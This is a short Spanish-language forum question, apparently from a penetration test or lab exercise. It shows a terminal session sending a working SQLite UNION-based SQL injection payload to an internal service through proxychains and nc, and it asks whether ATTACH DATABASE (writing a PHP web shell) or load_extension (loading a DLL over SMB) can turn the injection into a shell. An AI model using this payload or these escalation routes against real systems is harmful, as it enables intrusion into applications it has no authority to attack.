Necesito obtener un shell de una inyección SQL sobre una aplicación con la base de datos sqlite.
Actualmente mi exploit se parece a lo siguiente:
lucian@0x90:~/$ proxychains nc 10.185.10.55 1101
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:9999-<><>-10.185.10.55:1101-<><>-OK
Input please:
1 UNION ALL SELECT 42,'qvzbq'||'LOHpyNMpQSCCIaWebmCZHjvwrZhYczWfJGiXVBzV'||'qzzxq',42;-- sdasdasd
1 UNION ALL SELECT 42,'qvzbq'||'LOHpyNMpQSCCIaWebmCZHjvwrZhYczWfJGiXVBzV'||'qzzxq',42;-- sdasdasd
Parsing results...
Customer information: Damy Roali qvzbqLOHpyNMpQSCCIaWebmCZHjvwrZhYczWfJGiXVBzVqzzxq 42
lucian@0x90:~/$
Siguiendo este enlace enlace descubrí que puedo ADJUNTAR LA BASE DE DATOS (creando un archivo .php en la raíz del documento de una carpeta web) o load_extension (cargando un archivo dll desde una ruta smb) para obtener el shell.
¿Es esto predeterminado en SQLite o debo habilitar algo o verificar algo?